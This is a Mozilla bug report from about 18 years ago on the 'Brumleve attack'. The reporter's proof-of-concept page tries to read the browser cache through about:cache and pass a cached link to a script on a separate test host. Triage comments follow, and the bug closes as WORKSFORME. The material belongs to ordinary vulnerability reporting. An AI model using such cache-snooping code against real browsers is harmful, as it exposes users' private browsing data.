Brumleve attack locks up Moz

VERIFIED WORKSFORME

Status

Core
Security
P3
normal
18 years ago

People

(Reporter: John Unruh, Assigned: Mitchell Stoltz (not reading bugmail))

Tracking

Trunk
All
Windows NT

(Reporter)

Description

18 years ago
1) Run the above URL. Code is below.
What happens: Windows - Moz locks up.
Linux - the user is asked to save a file getLink.js, but otherwise appears 
unaffected.
 
<title>Cache-Cow 4.07 (activated)</title>
  If the attack is successful, you will see a link from your cache 
  displayed in an alert. Otherwise you should get a JavaScript error 
  (you will need to open the javascript console to see it).
  <script>
  var slave;
  var data = "";

  function launch() {
    slave = window.open("javascript:void(0)", "slave");
    document.f.submit();
    document.g.submit(); 
  }

  function show() {
    document.g.urls.value = data;
    document.g.submit();
  }

  </script>
  <body onLoad="launch()">

  <base href="about:">

  <form action="cache" method="post" name=f target=slave>
  <input type=submit></form>
  <form action="http://junruh/jstests/getLink.js" name=g target=slave>
  <input type=submit></form>
  </body>

Comment 1

18 years ago
--> phil - working the same on NT as reported on Linux, could you try a recent 
build there and see what's happening? I don't know if being asked to save the 
file is not a security issue, and if it's not crashing we could move the bug to 
security instead.
Assignee: rogerl → pschwartau

Comment 2

18 years ago
Using Windows and Linux debug builds from 05/29/00 - 

In the Windows build, Moz does not lock up on the given URL. Instead, I get the 
prompt asking me to save the file getLink.js - the behavior the reporter 
describes for Linux.

On Linux, however, I do not get a prompt to save the file. I just get an empty 
child window of the parent window. The child window has no URL showing. In the 
debug window we see "Error loading URL http://junruh/jstests/cache". I am unable 
to bring up the JavaScript console at all when this happens.

I could close this bug, because Moz is not locking up on Windows as originally 
reported. However, could Security please review this? I don't understand 
Security issues enough to understand what the Brumleve attack is, and whether 
the behavior we are seeing now is acceptable. Thank you -  
Assignee: pschwartau → mstoltz
Component: Javascript Engine → Security: General
QA Contact: pschwartau → czhang
(Assignee)

Comment 3

18 years ago
I don't see any errant behavior or crash here, marking WORKSFORME.
Status: NEW → RESOLVED
Last Resolved: 18 years ago
Resolution: --- → WORKSFORME

Comment 4

18 years ago
I don't see anything insecure either.
Status: RESOLVED → VERIFIED